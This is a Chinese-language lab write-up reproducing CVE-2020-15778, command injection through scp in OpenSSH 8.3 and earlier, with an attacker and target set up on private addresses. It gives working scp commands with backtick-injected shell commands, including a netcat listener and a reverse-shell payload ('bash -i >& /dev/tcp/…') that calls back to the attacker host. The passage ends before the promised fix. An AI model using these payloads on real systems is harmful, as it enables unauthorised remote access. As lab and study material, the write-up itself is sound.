OpenSSH_8.3及以下-命令注入漏洞攻击与修复
漏洞:CVE-2020-15778
2020年6月9日发现漏洞,2020年7月18日公开漏洞。
攻击原理
使用SCP中远程功能进行命令注入。
漏洞复现要求
OpenSSH版本 =<8.3p1
ssh连接密码
攻击环境
攻击方:kali:192.168.0.130
靶机: CentOS7:192.168.0.187
攻击测试
kali:
上传任意文件到靶机上,文件允许为空,因为上传的文件不是主角。而是``里面的命令作为注入点进行攻击。
scp dic.txt root@192.168.0.187:'`touch /tmp/test.txt` /tmp'
命令解读:使用scp将本地文件dic.txt
上传到服务器root@192.168.0.187
的/tmp
文件夹,使用``括起来的touch /tmp/test.txt
就是注入的命令,会生成一个新的文件test.txt
。
靶机:
靶机查看/tmp
目录下的文件:
[root@localhost tmp]# ls
dic.txt test.txt
这样就实现了远程命令的执行。
GetShell
kali:
使用命令获取靶机的权限。
#使用一个窗口开启nc进行监听
nc -lvvp 7777
#开启另一个窗口,上传反弹shell的命令
scp dic.txt root@192.168.0.187:'`bash -i >& /dev/tcp/192.168.0.130/7777 0>&1`/tmp/attack.txt'
运行监听: